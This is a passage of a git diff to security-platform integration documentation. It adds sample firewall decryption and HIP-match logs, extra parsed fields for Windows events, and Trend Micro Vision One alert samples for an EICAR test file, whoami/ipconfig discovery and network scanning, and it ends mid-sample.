 |`url.original` | `wildcard` | Unmodified original url as seen in the event source. |
 |`url.path` | `wildcard` | Path of the request, such as "/search". |
diff --git a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md
index 11d626144..205c3e9e6 100644
--- a/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md
+++ b/_shared_content/operations_center/integrations/generated/903ec1b8-f206-4ba5-8563-db21da09cafd_sample.md
@@ -382,6 +382,114 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "test_decryption_csv"
+
+
+ ```json
+ 1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no
+
+ ```
+
+
+
+=== "test_decryption_json"
+
+
+ ```json
+ {
+ "TimeReceived": "2024-11-20T16:40:01.000000Z",
+ "DeviceSN": "no-serial",
+ "LogType": "DECRYPTION",
+ "Subtype": "start",
+ "SubType": "start",
+ "ConfigVersion": "10.2",
+ "TimeGenerated": "2024-11-20T16:39:51.000000Z",
+ "SourceAddress": "1.2.3.4",
+ "DestinationAddress": "5.6.7.8",
+ "NATSource": "4.3.2.1",
+ "NATDestination": "8.7.6.5",
+ "Rule": "URL Filtering - Chrome Profile",
+ "SourceUser": "example\\jdoe",
+ "DestinationUser": null,
+ "Application": "incomplete",
+ "VirtualLocation": "vsys1",
+ "FromZone": "VPN-SSL",
+ "ToZone": "INTERNET",
+ "InboundInterface": "tunnel.16",
+ "OutboundInterface": "ethernet1/1",
+ "LogSetting": "Forward-Syslog",
+ "TimeReceivedManagementPlane": "2024-11-20T16:39:51.000000Z",
+ "SessionID": 2222222,
+ "RepeatCount": 1,
+ "CountOfRepeat": 1,
+ "SourcePort": 58877,
+ "DestinationPort": 443,
+ "NATSourcePort": 1042,
+ "NATDestinationPort": 443,
+ "Protocol": "tcp",
+ "Action": "allow",
+ "Tunnel": "N/A",
+ "SourceUUID": null,
+ "DestinationUUID": null,
+ "RuleUUID": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5",
"ClientToFirewall": "Finished",
+ "FirewallToClient": "Client_Hello",
+ "TLSVersion": "TLS1.2",
+ "TLSKeyExchange": "ECDHE",
+ "TLSEncryptionAlgorithm": "AES_256_GCM",
+ "TLSAuth": "SHA384",
+ "PolicyName": "TLS - https inspection - default rule",
+ "EllipticCurve": "secp256r1",
+ "ErrorIndex": "Protocol",
+ "RootStatus": "trusted",
+ "ChainStatus": "Trusted",
+ "ProxyType": "Forward",
+ "CertificateSerial": "059125d73c34a73fca9",
+ "Fingerprint": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b",
+ "TimeNotBefore": 1730875569,
+ "TimeNotAfter": 1765176368,
+ "CertificateVersion": "V3",
+ "CertificateSize": 256,
+ "CommonNameLength": 13,
+ "IssuerNameLength": 29,
+ "RootCNLength": 10,
+ "SNILength": 23,
+ "CertificateFlags": 4,
+ "CommonName": "example.org",
+ "IssuerCommonName": "GlobalSign ECC OV SSL CA 2018",
+ "RootCommonName": "GlobalSign",
+ "ServerNameIndication": "static.files.example.org",
+ "ErrorMessage": "General TLS protocol error. Received fatal alert DecodeError from server",
+ "ContainerID": null,
+ "ContainerNameSpace": null,
+ "ContainerName": null,
+ "SourceEDL": null,
+ "DestinationEDL": null,
+ "SourceDynamicAddressGroup": null,
+ "DestinationDynamicAddressGroup": null,
+ "TimeGeneratedHighResolution": "2024-11-20T16:39:51.441000Z",
+ "SourceDeviceCategory": null,
+ "SourceDeviceProfile": null,
+ "SourceDeviceModel": null,
+ "SourceDeviceVendor": null,
+ "SourceDeviceOSFamily": null,
+ "SourceDeviceOSVersion": null,
+ "SourceDeviceHost": null,
+ "SourceDeviceMac": null,
+ "DestinationDeviceCategory": null,
+ "DestinationDeviceProfile": null,
+ "DestinationDeviceModel": null,
+ "DestinationDeviceVendor": null,
+ "DestinationDeviceOSFamily": null,
+ "DestinationDeviceOSVersion": null,
+ "DestinationDeviceHost": null,
+ "DestinationDeviceMac": null,
+ "SequenceNo": 1111111111111111111
+ }
+ ```
+ + + === "test_dhcp_renew_json"
@@ -618,6 +726,62 @@ In this section, you will find examples of raw logs as generated natively by the
+=== "test_hipmatch_csv"
+
+
+ ```json
+ 1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,
+ ```
+
+
+
+=== "test_hipmatch_json"
+
+
+ ```json
+ {
+ "TimeReceived": "2024-11-20T16:30:32.000000Z",
+ "DeviceSN": "no-serial",
+ "LogType": "HIPMATCH",
+ "Subtype": "hipmatch",
+ "ConfigVersion": "10.2",
+ "TimeGenerated": "2024-11-20T16:30:28.000000Z",
+ "SourceUser": "jdoe@example.org",
+ "VirtualLocation": "vsys1",
+ "EndpointDeviceName": "DESKTOP-01",
+ "EndpointOSType": "Windows",
+ "SourceIP": "1.2.3.4",
+ "HipMatchName": "VPN Compliant",
+ "RepeatCount": 1,
+ "CountOfRepeats": 1,
+ "HipMatchType": "profile",
+ "SequenceNo": 1111111111111111111,
+ "DGHierarchyLevel1": 12,
+ "DGHierarchyLevel2": 22,
+ "DGHierarchyLevel3": 0,
+ "DGHierarchyLevel4": 0,
+ "VirtualSystemName": "",
+ "DeviceName": "FW-ALK01",
+ "VirtualSystemID": 1,
+ "SourceIPv6": "",
+ "HostID": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
+ "EndpointSerialNumber": "aefee8",
+ "SourceDeviceCategory": null,
+ "SourceDeviceProfile": null,
+ "SourceDeviceModel": null,
+ "SourceDeviceVendor": null,
+ "SourceDeviceOSFamily": null,
+ "SourceDeviceOSVersion": null,
+ "SourceDeviceMac": null,
+ "SourceDeviceHost": null,
+ "Source": null,
+ "TimestampDeviceIdentification": null,
+ "TimeGeneratedHighResolution": "2024-11-20T16:30:28.904000Z"
+ }
+ ```
+ + + === "test_installed_package_json"
diff --git a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md
index b6d8df0b0..8255b04ac 100644
--- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md
+++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be.md
@@ -1754,6 +1754,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "record_id": 1674356873,
 "type": "Security"
 },
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
 "host": {
 "hostname": "hostname.example.org",
 "name": "hostname.example.org"
@@ -1775,6 +1783,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 },
 "related": {
 "hosts": [
+ "auth.example.org",
 "hostname.example.org"
 ],
 "user": [
@@ -1835,6 +1844,14 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "record_id": 783949626,
 "type": "Security"
 },
+ "destination": {
+ "address": "auth.example.org",
+ "domain": "auth.example.org",
+ "registered_domain": "example.org",
+ "size_in_char": 16,
+ "subdomain": "auth",
+ "top_level_domain": "org"
+ },
 "host": {
 "hostname": "hostname.example.org",
 "name": "hostname.example.org"
@@ -1856,6 +1873,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 },
 "related": {
 "hosts": [
+ "auth.example.org",
 "hostname.example.org"
 ],
 "user": [
@@ -5389,6 +5407,11 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "record_id": 2324634,
 "type": "Security"
 },
+ "destination": {
+ "address": "1.2.3.4",
+ "domain": "1.2.3.4",
+ "size_in_char": 7
+ },
 "host": {
 "hostname": "test",
 "name": "test"
@@ -5410,12 +5433,20 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 },
 "related": {
 "hosts": [
+ "1.2.3.4",
 "test"
 ],
+ "ip": [
+ "10.24.25.25"
+ ],
 "user": [
 "testUser"
 ]
 },
+ "source": {
+ "address": "10.24.25.25",
+ "ip": "10.24.25.25"
+ },
 "user": {
 "domain": "NT01",
 "id": "S-1-5-21-1111111111-111111111-1111111111-1111",
@@ -8164,6 +8195,7 @@ The following table lists the fields that are extracted, normalized under the EC
 |`source.address` | `keyword` | Source network address. |
 |`source.domain` | `keyword` | The domain name of the source. |
 |`source.ip` | `ip` | IP address of the source. |
+|`source.mac` | `keyword` | MAC address of the source. |
 |`source.port` | `long` | Port of the source. |
 |`source.size_in_char` | `number` | |
 |`url.domain` | `keyword` | Domain of the url. |
diff --git a/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md
new file mode 100644
index 000000000..a7a19d56e
--- /dev/null
+++ b/_shared_content/operations_center/integrations/generated/9844ea0a-de7f-45d4-9a9b-b07651f0630e.md
@@ -0,0 +1,624 @@
+
+### Event Categories
+
+
+The following table lists the data source offered by this integration.
+
+| Data Source | Description |
+| ----------- | ------------------------------------ |
+| `Process monitoring` | None |
+
+
+
+
+
+In details, the following table denotes the type of events produced by this integration.
+
+| Name | Values |
+| ---- | ------ |
+| Kind | `alert` |
+| Category | `intrusion_detection` |
+| Type | `info` |
+
+
+
+
+### Transformed Events Samples after Ingestion
+
+This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog.md) and hunting activities in the [events page](/xdr/features/investigate/events.md). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma.md) and to leverage the full potential of the collected data.
+ +=== "test_eicar_test_file_detection.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, 
{\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + 
"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } + + ``` + + +=== "test_information_gathering.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", 
\"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": 
\"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], 
\"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, 
{\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Potential Information Gathering",
+ "type": [
+ "info"
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
+ },
+ "@timestamp": "2024-11-26T16:48:06Z",
+ "host": {
+ "id": "7b00c266-f17f-439f-bb94-3945d463a78b",
+ "ip": [
+ "10.0.0.6"
+ ],
+ "name": "windows10"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ",
+ "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe",
+ "hash": {
+ "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ },
+ "parent": {
+ "command_line": "C:\\Windows\\Explorer.EXE",
+ "executable": "C:\\Windows\\explorer.exe",
+ "hash": {
+ "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753"
+ },
+ "pid": 9920
+ },
+ "pid": 5040
+ },
+ "related": {
+ "hash": [
+ "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753",
+ "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ ],
+ "ip": [
+ "10.0.0.6"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Potential Information Gathering"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "investigation_status": "New",
"severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } + + ``` + + +=== "test_internal_network_scanner.json" + + ```json + + { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", 